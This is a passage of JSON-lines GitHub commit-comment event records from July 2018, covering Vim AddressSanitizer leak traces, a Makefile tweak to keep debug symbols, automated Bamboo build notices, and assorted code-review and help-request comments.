(/home/user/.local/opt/vim/bin/vim+0x1e4d90)\r\n    #12 0x55b8e92e50d9  (/home/user/.local/opt/vim/bin/vim+0x1e50d9)\r\n    #13 0x55b8e930c735  (/home/user/.local/opt/vim/bin/vim+0x20c735)\r\n    #14 0x55b8e9281366  (/home/user/.local/opt/vim/bin/vim+0x181366)\r\n    #15 0x55b8e930c735  (/home/user/.local/opt/vim/bin/vim+0x20c735)\r\n    #16 0x55b8e95fb4da  (/home/user/.local/opt/vim/bin/vim+0x4fb4da)\r\n    #17 0x55b8e95fcb2e  (/home/user/.local/opt/vim/bin/vim+0x4fcb2e)\r\n    #18 0x55b8e95fd8b8  (/home/user/.local/opt/vim/bin/vim+0x4fd8b8)\r\n    #19 0x55b8e930c735  (/home/user/.local/opt/vim/bin/vim+0x20c735)\r\n    #20 0x55b8e9344bf7  (/home/user/.local/opt/vim/bin/vim+0x244bf7)\r\n    #21 0x55b8e9346a26  (/home/user/.local/opt/vim/bin/vim+0x246a26)\r\n    #22 0x55b8e9474aee  (/home/user/.local/opt/vim/bin/vim+0x374aee)\r\n    #23 0x55b8e947d270  (/home/user/.local/opt/vim/bin/vim+0x37d270)\r\n    #24 0x55b8e92ef30c  (/home/user/.local/opt/vim/bin/vim+0x1ef30c)\r\n    #25 0x55b8e930c735  (/home/user/.local/opt/vim/bin/vim+0x20c735)\r\n    #26 0x55b8e9281366  (/home/user/.local/opt/vim/bin/vim+0x181366)\r\n    #27 0x55b8e930c735  (/home/user/.local/opt/vim/bin/vim+0x20c735)\r\n    #28 0x55b8e95fb4da  (/home/user/.local/opt/vim/bin/vim+0x4fb4da)\r\n    #29 0x55b8e95fcb2e  (/home/user/.local/opt/vim/bin/vim+0x4fcb2e)\r\n\r\nDirect leak of 4848 byte(s) in 13 object(s) allocated from:\r\n    #0 0x7f92d67c6d99 in __interceptor_malloc /build/gcc/src/gcc/libsanitizer/asan/asan_malloc_linux.cc:86\r\n    #1 0x55b8e93e5abe  (/home/user/.local/opt/vim/bin/vim+0x2e5abe)\r\n    #2 0x55b8e93e746a  (/home/user/.local/opt/vim/bin/vim+0x2e746a)\r\n    #3 0x55b8e95f0bf9  (/home/user/.local/opt/vim/bin/vim+0x4f0bf9)\r\n    #4 0x55b8e95f857f  (/home/user/.local/opt/vim/bin/vim+0x4f857f)\r\n    #5 0x55b8e930c735  (/home/user/.local/opt/vim/bin/vim+0x20c735)\r\n    #6 0x55b8e92e7a2b  (/home/user/.local/opt/vim/bin/vim+0x1e7a2b)\r\n    #7 0x55b8e92e87bd  (/home/user/.local/opt/vim/bin/vim+0x1e87bd)\r\n    #8 0x55b8e92e471a  (/home/user/.local/opt/vim/bin/vim+0x1e471a)\r\n    #9 0x55b8e92e4bdf  (/home/user/.local/opt/vim/bin/vim+0x1e4bdf)\r\n    #10 0x55b8e92e4d62  (/home/user/.local/opt/vim/bin/vim+0x1e4d62)\r\n    #11 0x55b8e92e4d90  (/home/user/.local/opt/vim/bin/vim+0x1e4d90)\r\n    #12 0x55b8e92e50d9  (/home/user/.local/opt/vim/bin/vim+0x1e50d9)\r\n    #13 0x55b8e930c735  (/home/user/.local/opt/vim/bin/vim+0x20c735)\r\n    #14 0x55b8e9281366  (/home/user/.local/opt/vim/bin/vim+0x181366)\r\n    #15 0x55b8e930c735  (/home/user/.local/opt/vim/bin/vim+0x20c735)\r\n    #16 0x55b8e95fb4da  (/home/user/.local/opt/vim/bin/vim+0x4fb4da)\r\n    #17 0x55b8e95fcb2e  (/home/user/.local/opt/vim/bin/vim+0x4fcb2e)\r\n    #18 0x55b8e95fd8b8  (/home/user/.local/opt/vim/bin/vim+0x4fd8b8)\r\n    #19 0x55b8e930c735  (/home/user/.local/opt/vim/bin/vim+0x20c735)\r\n    #20 0x55b8e9344bf7  (/home/user/.local/opt/vim/bin/vim+0x244bf7)\r\n    #21 0x55b8e9346a26  (/home/user/.local/opt/vim/bin/vim+0x246a26)\r\n    #22 0x55b8e9474aee  (/home/user/.local/opt/vim/bin/vim+0x374aee)\r\n    #23 0x55b8e947d270  (/home/user/.local/opt/vim/bin/vim+0x37d270)\r\n    #24 0x55b8e92ef30c  (/home/user/.local/opt/vim/bin/vim+0x1ef30c)\r\n    #25 0x55b8e930c735  (/home/user/.local/opt/vim/bin/vim+0x20c735)\r\n    #26 0x55b8e9281366  (/home/user/.local/opt/vim/bin/vim+0x181366)\r\n    #27 0x55b8e930c735  (/home/user/.local/opt/vim/bin/vim+0x20c735)\r\n    #28 0x55b8e95fb4da  (/home/user/.local/opt/vim/bin/vim+0x4fb4da)\r\n    #29 0x55b8e95fcb2e  (/home/user/.local/opt/vim/bin/vim+0x4fcb2e)\r\n\r\nDirect leak of 4848 byte(s) in 13 object(s) allocated from:\r\n    #0 0x7f92d67c6d99 in __interceptor_malloc /build/gcc/src/gcc/libsanitizer/asan/asan_malloc_linux.cc:86\r\n    #1 0x55b8e93e5abe  (/home/user/.local/opt/vim/bin/vim+0x2e5abe)\r\n    #2 0x55b8e93e746a  (/home/user/.local/opt/vim/bin/vim+0x2e746a)\r\n    #3 0x55b8e95f0c31  (/home/user/.local/opt/vim/bin/vim+0x4f0c31)\r\n    #4 0x55b8e95f857f  (/home/user/.local/opt/vim/bin/vim+0x4f857f)\r\n    #5 0x55b8e930c735  (/home/user/.local/opt/vim/bin/vim+0x20c735)\r\n    #6 0x55b8e92e7a2b  (/home/user/.local/opt/vim/bin/vim+0x1e7a2b)\r\n    #7 0x55b8e92e87bd  (/home/user/.local/opt/vim/bin/vim+0x1e87bd)\r\n    #8 0x55b8e92e471a  (/home/user/.local/opt/vim/bin/vim+0x1e471a)\r\n    #9 0x55b8e92e4bdf  (/home/user/.local/opt/vim/bin/vim+0x1e4bdf)\r\n    #10 0x55b8e92e4d62  (/home/user/.local/opt/vim/bin/vim+0x1e4d62)\r\n    #11 0x55b8e92e4d90  (/home/user/.local/opt/vim/bin/vim+0x1e4d90)\r\n    #12 0x55b8e92e50d9  (/home/user/.local/opt/vim/bin/vim+0x1e50d9)\r\n    #13 0x55b8e930c735  (/home/user/.local/opt/vim/bin/vim+0x20c735)\r\n    #14 0x55b8e9281366  (/home/user/.local/opt/vim/bin/vim+0x181366)\r\n    #15 0x55b8e930c735  (/home/user/.local/opt/vim/bin/vim+0x20c735)\r\n    #16 0x55b8e95fb4da  (/home/user/.local/opt/vim/bin/vim+0x4fb4da)\r\n    #17 0x55b8e95fcb2e  (/home/user/.local/opt/vim/bin/vim+0x4fcb2e)\r\n    #18 0x55b8e95fd8b8  (/home/user/.local/opt/vim/bin/vim+0x4fd8b8)\r\n    #19 0x55b8e930c735  (/home/user/.local/opt/vim/bin/vim+0x20c735)\r\n    #20 0x55b8e9344bf7  (/home/user/.local/opt/vim/bin/vim+0x244bf7)\r\n    #21 0x55b8e9346a26  (/home/user/.local/opt/vim/bin/vim+0x246a26)\r\n    #22 0x55b8e9474aee  (/home/user/.local/opt/vim/bin/vim+0x374aee)\r\n    #23 0x55b8e947d270  (/home/user/.local/opt/vim/bin/vim+0x37d270)\r\n    #24 0x55b8e92ef30c  (/home/user/.local/opt/vim/bin/vim+0x1ef30c)\r\n    #25 0x55b8e930c735  (/home/user/.local/opt/vim/bin/vim+0x20c735)\r\n    #26 0x55b8e9281366  (/home/user/.local/opt/vim/bin/vim+0x181366)\r\n    #27 0x55b8e930c735  (/home/user/.local/opt/vim/bin/vim+0x20c735)\r\n    #28 0x55b8e95fb4da  (/home/user/.local/opt/vim/bin/vim+0x4fb4da)\r\n    #29 0x55b8e95fcb2e  (/home/user/.local/opt/vim/bin/vim+0x4fcb2e)\r\n\r\nDirect leak of 1212 byte(s) in 13 object(s) allocated from:\r\n    #0 0x7f92d67c6d99 in __interceptor_malloc /build/gcc/src/gcc/libsanitizer/asan/asan_malloc_linux.cc:86\r\n    #1 0x55b8e93e5abe  (/home/user/.local/opt/vim/bin/vim+0x2e5abe)\r\n    #2 0x55b8e93e746a  (/home/user/.local/opt/vim/bin/vim+0x2e746a)\r\n    #3 0x55b8e95f0bc2  (/home/user/.local/opt/vim/bin/vim+0x4f0bc2)\r\n    #4 0x55b8e95f857f  (/home/user/.local/opt/vim/bin/vim+0x4f857f)\r\n    #5 0x55b8e930c735  (/home/user/.local/opt/vim/bin/vim+0x20c735)\r\n    #6 0x55b8e92e7a2b  (/home/user/.local/opt/vim/bin/vim+0x1e7a2b)\r\n    #7 0x55b8e92e87bd  (/home/user/.local/opt/vim/bin/vim+0x1e87bd)\r\n    #8 0x55b8e92e471a  (/home/user/.local/opt/vim/bin/vim+0x1e471a)\r\n    #9 0x55b8e92e4bdf  (/home/user/.local/opt/vim/bin/vim+0x1e4bdf)\r\n    #10 0x55b8e92e4d62  (/home/user/.local/opt/vim/bin/vim+0x1e4d62)\r\n    #11 0x55b8e92e4d90  (/home/user/.local/opt/vim/bin/vim+0x1e4d90)\r\n    #12 0x55b8e92e50d9  (/home/user/.local/opt/vim/bin/vim+0x1e50d9)\r\n    #13 0x55b8e930c735  (/home/user/.local/opt/vim/bin/vim+0x20c735)\r\n    #14 0x55b8e9281366  (/home/user/.local/opt/vim/bin/vim+0x181366)\r\n    #15 0x55b8e930c735  (/home/user/.local/opt/vim/bin/vim+0x20c735)\r\n    #16 0x55b8e95fb4da  (/home/user/.local/opt/vim/bin/vim+0x4fb4da)\r\n    #17 0x55b8e95fcb2e  (/home/user/.local/opt/vim/bin/vim+0x4fcb2e)\r\n    #18 0x55b8e95fd8b8  (/home/user/.local/opt/vim/bin/vim+0x4fd8b8)\r\n    #19 0x55b8e930c735  (/home/user/.local/opt/vim/bin/vim+0x20c735)\r\n    #20 0x55b8e9344bf7  (/home/user/.local/opt/vim/bin/vim+0x244bf7)\r\n    #21 0x55b8e9346a26  (/home/user/.local/opt/vim/bin/vim+0x246a26)\r\n    #22 0x55b8e9474aee  (/home/user/.local/opt/vim/bin/vim+0x374aee)\r\n    #23 0x55b8e947d270  (/home/user/.local/opt/vim/bin/vim+0x37d270)\r\n    #24 0x55b8e92ef30c  (/home/user/.local/opt/vim/bin/vim+0x1ef30c)\r\n    #25 0x55b8e930c735  (/home/user/.local/opt/vim/bin/vim+0x20c735)\r\n    #26 0x55b8e9281366  (/home/user/.local/opt/vim/bin/vim+0x181366)\r\n    #27 0x55b8e930c735  (/home/user/.local/opt/vim/bin/vim+0x20c735)\r\n    #28 0x55b8e95fb4da  (/home/user/.local/opt/vim/bin/vim+0x4fb4da)\r\n    #29 0x55b8e95fcb2e  (/home/user/.local/opt/vim/bin/vim+0x4fcb2e)\r\n```\r\n\r\nWithout the one-line patch it looked like only the \"20000 bytes\" leak was there, but hard to say for me.\r\n\r\nI've used `make SANITIZER_CFLAGS=\"-g -O1 -DABORT_ON_INTERNAL_ERROR -DEXITFREE -fsanitize=address -fno-omit-frame-pointer\"` with Vim, and then `export ASAN_OPTIONS=\"print_stacktrace=1 log_path=/tmp/asan\"` when running it - both based on what I've found in `.travis.yml`.\r\n"}},"created_at":"2018-07-22T18:42:34Z"}
{"id":"8000671466","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793914,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-22T18:42:59Z","updated_at":"2018-07-22T18:42:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:42:59Z"}
{"id":"8000671500","type":"CommitCommentEvent","actor":{"login":"tobbi"},"repo":{"name":"SuperTux/supertux"},"payload":{"comment":{"id":29793915,"position":71,"line":71,"path":"src/video/canvas.cpp","commit_id":"f2cc3043b5d0b9aede81e6b156d711106b6e75db","created_at":"2018-07-22T18:43:01Z","updated_at":"2018-07-22T18:43:01Z","author_association":"MEMBER","body":"You could actually use the shorter for syntax for this loop."}},"created_at":"2018-07-22T18:43:01Z"}
{"id":"8000671995","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793920,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-22T18:43:23Z","updated_at":"2018-07-22T18:43:23Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:43:23Z"}
{"id":"8000672859","type":"CommitCommentEvent","actor":{"login":"MichaelDimmitt"},"repo":{"name":"VolodymyrPliuta/gmap-Revamp"},"payload":{"comment":{"id":29793927,"position":42,"line":36,"path":"js/main.js","commit_id":"e178f92dfe9968a4597e379e2fa21ab54b7bda3d","created_at":"2018-07-22T18:44:02Z","updated_at":"2018-07-22T18:44:02Z","author_association":"NONE","body":"then you could break landmarks out to its own object \r\n```javascript\r\nconst SanFranciscoLandmarks = starbucks: {lat: 37.761211, lng: -122.434701}, \r\n    tastyburger: {lat: 37.761201, lng: -122.434720},\r\n    gym: {lat: 37.761201, lng: -122.434711} \r\n```\r\n\r\n```javascript\r\nSF: {cityName: 'SanFrancisco', city: {lat: 37.761201, lng: -122.434701}, zoom: 8,\r\n  landmarks: SanFranciscoLandmarks\r\n}\r\n```"}},"created_at":"2018-07-22T18:44:02Z"}
{"id":"8000673055","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29793928,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-22T18:44:10Z","updated_at":"2018-07-22T18:44:10Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-22T18:44:10Z"}
{"id":"8000674373","type":"CommitCommentEvent","actor":{"login":"afsana140896"},"repo":{"name":"tanmoyie/Professional-Development"},"payload":{"comment":{"id":29793931,"position":null,"line":null,"path":null,"commit_id":"f259694df8e6ac8c4ffd1d18e09543743c836188","created_at":"2018-07-22T18:45:13Z","updated_at":"2018-07-22T18:45:13Z","author_association":"NONE","body":"https://www.linkedin.com/in/afsana-mimi-866263151/\r\nhttps://novoresume.com/editor/resume/4d9cd190-8cf1-11e8-9e30-57cf55f6ece4\r\n[Afsana's Resume.pdf](https://github.com/tanmoyie/Professional-Development/files/2217285/Afsana.s.Resume.pdf)\r\n"}},"created_at":"2018-07-22T18:45:13Z"}
{"id":"8000676051","type":"CommitCommentEvent","actor":{"login":"crossan007"},"repo":{"name":"ChurchCRM/CRM"},"payload":{"comment":{"id":29793935,"position":5,"line":102,"path":"src/views/email/BaseEmail.html","commit_id":"7541ec2a516b4285c9aaa7200a10a2004fc1081d","created_at":"2018-07-22T18:46:27Z","updated_at":"2018-07-22T18:46:27Z","author_association":"NONE","body":"done in 616e282"}},"created_at":"2018-07-22T18:46:27Z"}
{"id":"8000676955","type":"CommitCommentEvent","actor":{"login":"sablerime"},"repo":{"name":"sablerime/sablerime.github.io"},"payload":{"comment":{"id":29793936,"position":null,"line":null,"path":null,"commit_id":"8f6d5064b682ec064ab74a5da3aa25d865bb01f7","created_at":"2018-07-22T18:47:09Z","updated_at":"2018-07-22T18:47:09Z","author_association":"OWNER","body":"I was trying to set up a custom email address like hello[at]sablerime[dot]github[dot]\r\nio until I realised that in order to change the DNS records for this domain, I need to own Github. \r\n\r\n![star_trek_picard_s_double_facepalm_emote_by_speedfreako9-day6dl8](https://user-images.githubusercontent.com/16446369/43048952-9730a922-8e0d-11e8-8818-7c78ca628e40.gif)\r\n"}},"created_at":"2018-07-22T18:47:09Z"}
{"id":"8000683742","type":"CommitCommentEvent","actor":{"login":"snehaparameshwarachar"},"repo":{"name":"springframeworkguru/spring-boot-mariadb-example"},"payload":{"comment":{"id":29793942,"position":null,"line":null,"path":null,"commit_id":"07505d9098d088cf1ec2ae9bd6b15bf172ccae82","created_at":"2018-07-22T18:51:34Z","updated_at":"2018-07-22T18:51:34Z","author_association":"NONE","body":"Hi I was getting error \" The type org.springframework.data.repository.Repository cannot be resolved. It is indirectly referenced from required .class files \" on the below line pointing for CrudRepositary\r\n@Repository\r\npublic interface ProductRepository extends CrudRepository<Product,Long> {\r\n}\r\n\r\nPlease tel me why this repositary error? I tried cleaning and building the project work space many times. Still it is asking me to configure build path for fix. spring-tx jar is also present. Kindly help me to resolve this.\r\n\r\nThanks & Regards,\r\nSneha Parameshwarachar"}},"created_at":"2018-07-22T18:51:34Z"}
{"id":"8000684077","type":"CommitCommentEvent","actor":{"login":"coyotte508"},"repo":{"name":"donkeytech/gaia-engine"},"payload":{"comment":{"id":29793943,"position":4,"line":558,"path":"src/engine.ts","commit_id":"e7cf5662eaaea929fb5f2f80dc8b4563d4a2a165","created_at":"2018-07-22T18:51:50Z","updated_at":"2018-07-22T18:51:50Z","author_association":"CONTRIBUTOR","body":"> Whenever you gain a tech tile, you may advance in a research area on the research board. \r\n\r\nYou're right!! I didn't know that.\r\n\r\nIn that case, we need to change the advance phase, to allow to decline. We can reuse the decline command."}},"created_at":"2018-07-22T18:51:50Z"}
{"id":"8000686843","type":"CommitCommentEvent","actor":{"login":"seanhly"},"repo":{"name":"shiva/st"},"payload":{"comment":{"id":29793944,"position":null,"line":null,"path":null,"commit_id":"9b74fcadc46ee78b38b20e9663c6924cd9df7e84","created_at":"2018-07-22T18:53:55Z","updated_at":"2018-07-22T18:53:55Z","author_association":"NONE","body":"I've been wondering how st does it with regards font support?  I usually test out a new terminal's unicode support by opening wikipedia.org in elinks to see how many rows for languages appear as \"blocks\".  St is the only terminal so far (on my setup at least) that shows every row with a valid font for each language.\r\n\r\nIs this the commit that created this amazing utf8 support?"}},"created_at":"2018-07-22T18:53:55Z"}
{"id":"8000686934","type":"CommitCommentEvent","actor":{"login":"HeyIts-RJ"},"repo":{"name":"kartikay1999/OOPS-RPG-GAME"},"payload":{"comment":{"id":29793945,"position":54,"line":54,"path":"main.py","commit_id":"58a6cceb4dfe9f7baded47567d8ec4fc94b57627","created_at":"2018-07-22T18:53:59Z","updated_at":"2018-07-22T18:53:59Z","author_association":"NONE","body":"add condition if user input something other that the choices, program terminate itself. Add a loop take input from the user until the option is correct!"}},"created_at":"2018-07-22T18:53:59Z"}
{"id":"8000687907","type":"CommitCommentEvent","actor":{"login":"tdhooper"},"repo":{"name":"KoltesDigital/shadertoy-exporter"},"payload":{"comment":{"id":29793946,"position":null,"line":null,"path":null,"commit_id":"9d802f9c3235c088d9c1a548c7932c66bda52907","created_at":"2018-07-22T18:54:43Z","updated_at":"2018-07-22T18:54:43Z","author_association":"COLLABORATOR","body":"#2 fixes this for me :) could you give it a test and merge?"}},"created_at":"2018-07-22T18:54:43Z"}
{"id":"8000689817","type":"CommitCommentEvent","actor":{"login":"alexey-lysiuk"},"repo":{"name":"coelckers/gzdoom"},"payload":{"comment":{"id":29793949,"position":null,"line":null,"path":null,"commit_id":"fccb0b76c6a99954628b8c819fbddb018ee8a061","created_at":"2018-07-22T18:56:11Z","updated_at":"2018-07-22T18:56:11Z","author_association":"COLLABORATOR","body":"It should be named `max` I believe. But what’s the problem with `MIN()` and `MAX()` from `templates.h`?"}},"created_at":"2018-07-22T18:56:11Z"}
{"id":"8000689871","type":"CommitCommentEvent","actor":{"login":"ChongDeng"},"repo":{"name":"ChongDeng/PP_Relaunch"},"payload":{"comment":{"id":29793950,"position":null,"line":null,"path":null,"commit_id":"1b0c8236cd4415e3310cd0b53024b4d239487f49","created_at":"2018-07-22T18:56:14Z","updated_at":"2018-07-22T18:56:14Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-22T18:56:14Z"}
{"id":"8000691587","type":"CommitCommentEvent","actor":{"login":"afsana140896"},"repo":{"name":"tanmoyie/Professional-Development"},"payload":{"comment":{"id":29793953,"position":null,"line":null,"path":null,"commit_id":"f259694df8e6ac8c4ffd1d18e09543743c836188","created_at":"2018-07-22T18:57:33Z","updated_at":"2018-07-22T18:57:33Z","author_association":"NONE","body":"https://www.linkedin.com/in/afsana-mimi-866263151/\r\n[My Resume.pdf](https://github.com/tanmoyie/Professional-Development/files/2217291/My.Resume.pdf)\r\nhttps://novoresume.com/editor/resume/4d9cd190-8cf1-11e8-9e30-57cf55f6ece4"}},"created_at":"2018-07-22T18:57:33Z"}
{"id":"8000691954","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"RezYlander/OOP-carousell"},"payload":{"comment":{"id":29793954,"position":null,"line":null,"path":null,"commit_id":"50b742d8bcb90053043c618a4e48c7bf70e2a5cf","created_at":"2018-07-22T18:57:51Z","updated_at":"2018-07-22T18:57:51Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-22T18:57:51Z"}
{"id":"8000692672","type":"CommitCommentEvent","actor":{"login":"glensc"},"repo":{"name":"WeblateOrg/weblate"},"payload":{"comment":{"id":29793956,"position":11,"line":206,"path":"docs/admin/management.rst","commit_id":"9885c9ed7c4f4e6c7771b9c414d60ca9e881c541","created_at":"2018-07-22T18:58:23Z","updated_at":"2018-07-22T18:58:23Z","author_association":"CONTRIBUTOR","body":"`chache` typo"}},"created_at":"2018-07-22T18:58:23Z"}
{"id":"8000693385","type":"CommitCommentEvent","actor":{"login":"Jejelaye"},"repo":{"name":"Jejelaye/mod5-solution"},"payload":{"comment":{"id":29793957,"position":null,"line":null,"path":null,"commit_id":"b09a5add82079b74dfef05f95c8f169f2a6e265f","created_at":"2018-07-22T18:58:57Z","updated_at":"2018-07-22T18:58:57Z","author_association":"OWNER","body":"![restaurant-logo_large](https://user-images.githubusercontent.com/22539672/43049050-76c74534-8de9-11e8-941f-5833b97f56ea.png)\r\n![restaurant-logo_medium](https://user-images.githubusercontent.com/22539672/43049051-771c734c-8de9-11e8-85c1-37e0d8944e55.png)\r\n![restaurant-logo_small](https://user-images.githubusercontent.com/22539672/43049052-77527fdc-8de9-11e8-8d6c-96c4ecfb7d17.png)\r\n![specials-tile](https://user-images.githubusercontent.com/22539672/43049053-7789feda-8de9-11e8-982b-3355461dbee7.jpg)\r\n![star-k-logo](https://user-images.githubusercontent.com/22539672/43049054-77ca4e40-8de9-11e8-970f-00605e06cfc6.png)\r\n![ajax-loader](https://user-images.githubusercontent.com/22539672/43049055-780ee3ca-8de9-11e8-871d-35acb44f4539.gif)\r\n![jumbotron_768](https://user-images.githubusercontent.com/22539672/43049057-785a7bdc-8de9-11e8-8de5-eae9188c6f38.jpg)\r\n![jumbotron_992](https://user-images.githubusercontent.com/22539672/43049058-78972d98-8de9-11e8-8313-c45c77d2cd04.jpg)\r\n![jumbotron_1200](https://user-images.githubusercontent.com/22539672/43049059-78fe39de-8de9-11e8-8879-7a314c5b9da9.jpg)\r\n![menu-tile](https://user-images.githubusercontent.com/22539672/43049060-793fe79e-8de9-11e8-9046-b3b47d30ee66.jpg)\r\n![restaurant-logo](https://user-images.githubusercontent.com/22539672/43049062-79a864f4-8de9-11e8-9777-aef3103ba3bf.png)\r\n"}},"created_at":"2018-07-22T18:58:57Z"}
{"id":"8000693437","type":"CommitCommentEvent","actor":{"login":"dpelle"},"repo":{"name":"vim/vim"},"payload":{"comment":{"id":29793958,"position":null,"line":null,"path":null,"commit_id":"ad6480961080f80a455b2394f27b02935a2ded52","created_at":"2018-07-22T18:58:59Z","updated_at":"2018-07-22T18:58:59Z","author_association":"NONE","body":"Your asan log is not usable because symbols were stripped.\r\nTry again after commenting this line and re-building:\r\n```\r\ndiff --git a/src/Makefile b/src/Makefile\r\nindex f2fafa4dc..96dd34f98 100644\r\n--- a/src/Makefile\r\n+++ b/src/Makefile\r\n@@ -2210,7 +2210,7 @@ installvimbin: $(VIMTARGET) $(DESTDIR)$(exec_prefix) $(DEST_BIN)\r\n          rm -f $(DEST_BIN)/$(VIMNAME).rm; \\\r\n        fi\r\n        $(INSTALL_PROG) $(VIMTARGET) $(DEST_BIN)\r\n-       $(STRIP) $(DEST_BIN)/$(VIMTARGET)\r\n+       #$(STRIP) $(DEST_BIN)/$(VIMTARGET)\r\n        chmod $(BINMOD) $(DEST_BIN)/$(VIMTARGET)\r\n # may create a link to the new executable from /usr/bin/vi\r\n        -$(LINKIT)\r\n```"}},"created_at":"2018-07-22T18:58:59Z"}
{"id":"8000698151","type":"CommitCommentEvent","actor":{"login":"zuleima10"},"repo":{"name":"zuleima10/udemy-heroes"},"payload":{"comment":{"id":29793968,"position":null,"line":null,"path":null,"commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-22T19:02:11Z","updated_at":"2018-07-22T19:02:11Z","author_association":"OWNER","body":"#Notas \r\nEntiendo porque agregaste a Deadshop, lo necesitamos"}},"created_at":"2018-07-22T19:02:11Z"}
{"id":"8000698446","type":"CommitCommentEvent","actor":{"login":"Chrisnetika"},"repo":{"name":"MalloyDelacroix/DownloaderForReddit"},"payload":{"comment":{"id":29793969,"position":null,"line":null,"path":null,"commit_id":"6be5d5a5145174eb56b53ab222941cabe648c331","created_at":"2018-07-22T19:02:24Z","updated_at":"2018-07-22T19:02:24Z","author_association":"NONE","body":"O wow I didn't even see the wiki derp, thx that's what i'm looking for lol"}},"created_at":"2018-07-22T19:02:24Z"}
{"id":"8000699964","type":"CommitCommentEvent","actor":{"login":"DubrulleKevin"},"repo":{"name":"FredBezies/arch-tuto-installation"},"payload":{"comment":{"id":29793970,"position":null,"line":null,"path":null,"commit_id":"683742ae670874b43ee366ee503fff56b095c7ab","created_at":"2018-07-22T19:03:29Z","updated_at":"2018-07-22T19:03:29Z","author_association":"CONTRIBUTOR","body":"Salut Fred,\r\n\r\nJe vois des balises fermantes </br>,  mais pas d'ouvrantes, normal (à tous les coups je vais passer pour un con, mais pas grave !) ?\r\n\r\nVeux-tu que je rajoutes cela dans le script generates_toc.sh ?"}},"created_at":"2018-07-22T19:03:29Z"}
{"id":"8000699973","type":"CommitCommentEvent","actor":{"login":"jcameron"},"repo":{"name":"webmin/webmin"},"payload":{"comment":{"id":29793971,"position":19,"line":192,"path":"net/netplan-lib.pl","commit_id":"9b01780508fd92d4bbdbc588a93be6d0f9d40a19","created_at":"2018-07-22T19:03:29Z","updated_at":"2018-07-22T19:03:29Z","author_association":"COLLABORATOR","body":"Thanks, will fix."}},"created_at":"2018-07-22T19:03:29Z"}
{"id":"8000702455","type":"CommitCommentEvent","actor":{"login":"lannocc"},"repo":{"name":"AlphaGriffin/bitcash"},"payload":{"comment":{"id":29793973,"position":null,"line":null,"path":null,"commit_id":"7ae6e00a30e9cbc04b4a175c11e76925c29eb925","created_at":"2018-07-22T19:05:08Z","updated_at":"2018-07-22T19:05:08Z","author_association":"MEMBER","body":"Note that the version number used is essentially a temporary minor version increment with the intention that upstream will assign a proper version number when released.\r\n\r\nThis is just the beginning of what is likely to be a few more changes coming soon as I make use of this library."}},"created_at":"2018-07-22T19:05:08Z"}
{"id":"8000706423","type":"CommitCommentEvent","actor":{"login":"marenzo"},"repo":{"name":"outbrain/ob1k"},"payload":{"comment":{"id":29793975,"position":17,"line":127,"path":"ob1k-cache/src/test/java/com/outbrain/ob1k/cache/AbstractMemcachedClientTest.java","commit_id":"653d73947038f11cd193166e6a36c3adbac96db4","created_at":"2018-07-22T19:07:44Z","updated_at":"2018-07-22T19:07:44Z","author_association":"CONTRIBUTOR","body":"it's confusing test now. deleting not created key? if it is, where it was created? unclear"}},"created_at":"2018-07-22T19:07:44Z"}
